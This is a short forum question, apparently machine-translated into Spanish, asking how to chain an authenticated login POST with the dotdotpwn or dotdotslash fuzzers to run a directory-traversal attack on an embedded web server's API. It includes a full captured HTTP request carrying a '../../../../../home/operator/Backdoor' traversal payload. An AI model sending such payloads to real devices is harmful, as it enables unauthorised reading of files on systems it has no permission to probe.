Estoy intentando borrar un servidor web incorporado. El problema es que las solicitudes de API requieren que un usuario inicie sesión al enviar una solicitud POST con el nombre de usuario y la contraseña. Sin la solicitud POST, el servidor devolverá un error 403. ¿Hay alguna forma de enviar esta solicitud POST con dotdotpwn y luego comenzar a ejecutar el ataque de confusión de directorios del directorio? Tal vez dotdotslash podría funcionar mejor?
Por ejemplo:
POST /api/edge/feature.json HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Referer: https://192.168.2.1/
Content-Type: application/json
X-CSRF-TOKEN: 4310724fdcab5474ab225a105bd6f86d43247dbaf5b7f4aa2ec329a641ec55ec
X-Requested-With: XMLHttpRequest
Content-Length: 90
Cookie: ip_address_top_user_option=total_bytes; PHPSESSID=i6um09hej0ku2k5ctcp6ib56f1nrqhi7; X-CSRF-TOKEN=4310724fdcab5474ab225a105bd6f86d43247dbaf5b7f4aa2ec329a641ec55ec
Connection: close
{"data":{"scenario":"../../../../../home/operator/Backdoor","action":"load"}}